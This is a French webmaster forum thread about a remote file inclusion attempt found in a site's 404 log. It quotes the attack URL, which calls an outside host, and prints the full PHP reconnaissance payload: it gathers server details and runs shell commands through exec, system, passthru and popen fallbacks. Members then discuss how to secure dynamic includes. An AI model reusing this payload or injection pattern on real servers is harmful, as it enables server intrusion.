Tentative de piratage...

[medium69]

Je viens d'avoir une erreur 404 bizarre :

Url demandée : /themes/thematique/rubrique/*.php?sel=http://72.29.86.131/~thedaemo/infect.jpg?
Navigateur utilisé : libwww-perl/5.79
Méthode utilisée : GET
Nom de Domaine : ns1.oatl.net
IP du visiteur : 72.35.73.2

J'ai été voir cette adresse : -http://72.29.86.131/~thedaemo/infect.jpg?

Voici le contenu du code source :

Code: Tout sélectionner

<?
$dir = @getcwd();
$ker = @php_uname();
echo "By Blu3H4".(5+2);

$OS = @PHP_OS;
$IpServer = $_SERVER["SERVER_ADDR"];
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');

if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = "$SafeMode"; }

echo "<br> blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end";



echo "Blu3H47<br>";

$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


?>

Qu'est-ce que cela essaye de faire exactement ??

[medium69]

Il à fait trois essais : un sur le domaine principal et deux sur des répertoires.

[julienr]

je me demande bien de quelle faille de quel cms il essaye d'exploiter...sinon après il pourrait faire bien pire, là il semble se contenter de collecter un max d'info sur le serveur

[Tilt]

http://www.google.fr/search?q=Blu3H47&s ... FR176FR231



un peu de pub pour avast !! :0

[medium69]

Trop fort le référencement de WRI : http://www.google.fr/search?hl=fr&rlz=1 ... %3Dlang_fr

Déjà sur Google après quelques minutes

[Tilt]

Vu sur http://72.29.86.131 , le serveur pirate : "great success !" , un hommage à Borat ! En tout cas ils ont de l'humour.
M'étonnerait pas qu'ils viennent du Kazakhstan

Ah bah non en fait : Brasil !
l'hébergeur de notre ami :
http://pontox.com.br/nos.htm

Et pour ceux qui ont envie de tchatter avec eux :
irc://143.107.183.88:1337

[rog]

lol

considérer tool25 comme un virus est un vrai scandale

c'est un de mes potes il a changé de nick maintenant il s'appelle snag

http://sn4g.net/v1/index.php

rog

[Serious]

Qu'est-ce que cela essaye de faire exactement ??

Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.

[Leonick]

Qu'est-ce que cela essaye de faire exactement ??

Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.

ben, "Injection de code PHP", je crois que si, on peut parler de tentative de piratage

[zeb]

Qu'est-ce que cela essaye de faire exactement ??

Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.

ensuite c'est ce script qui entre en jeux via une faille include par exemple : -http://72.29.86.131/~thedaemo/tool25.dat

[medium69]

Qu'est-ce que cela essaye de faire exactement ??

Injection de code PHP pour tester la configuration, le but etant de determiner si ta machine est "interessante". A ce niveau, on ne peut pas vraiment parler de piratage.

ben, "Injection de code PHP", je crois que si, on peut parler de tentative de piratage

J'ai créer un fichier avec le script et c'est vrai que sil il passe, il à tout un tas d'infos sur le serveur où se trouve le site...

Heureusement que ça n'est pas passé

D'ailleurs je vais sécuriser un peu plus...

[julienr]

d'un autre coté le gars qui évalue ou qui inclue un fichier provenant d'un paramêtre GET/POST/COOKIE faut pas qu'il vienne pleurer qu'il s'est fait hacker ensuite lol

[Djoule_logo]

Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.

[f_trt]

Sauf si l'include via le GET est "securisé". Pour mon site, j'appelle des fichiers en inculde via un GET, mais ma commande est du genre
include ("partie_fixe_$ma_variable").
Tu auras beau tenter d'inclure un fichier distant via le GET le serveur ne trouvera jamais le fichier

P.S :
Ou alors s'il y a malgré tout une faille, donnez la moi que je sécurise de suite.

Ah oui et si il y a un brute force pour trouver ta partie fixe tu es eu, il te faut faire une condition avec filexist

Exemple :

Code: Tout sélectionner

if(isset($_GET['ma_variable']) AND file_exists("partie_fixe_$ma_variable")


[julienr]

D'une manière générale y a toujours moyen de faire autrement qu'un include dynamique comme par exemple utiliser des fonctions, des templates, etc